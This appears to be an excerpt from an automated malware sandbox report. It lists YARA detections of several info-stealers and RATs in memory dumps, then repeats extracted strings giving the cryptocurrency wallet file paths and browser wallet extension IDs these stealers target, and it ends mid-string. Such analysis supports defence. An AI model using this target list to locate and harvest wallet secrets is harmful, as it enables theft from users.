Source: Yara match	File source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811fbeb15.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811f449f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2042934542.000001487C95B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\qbji, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7420, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5g0.0.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5g0.0.exe PID: 5408, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\sppc.dllaming\Exodus\exodus.wallet\seed.seco
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron 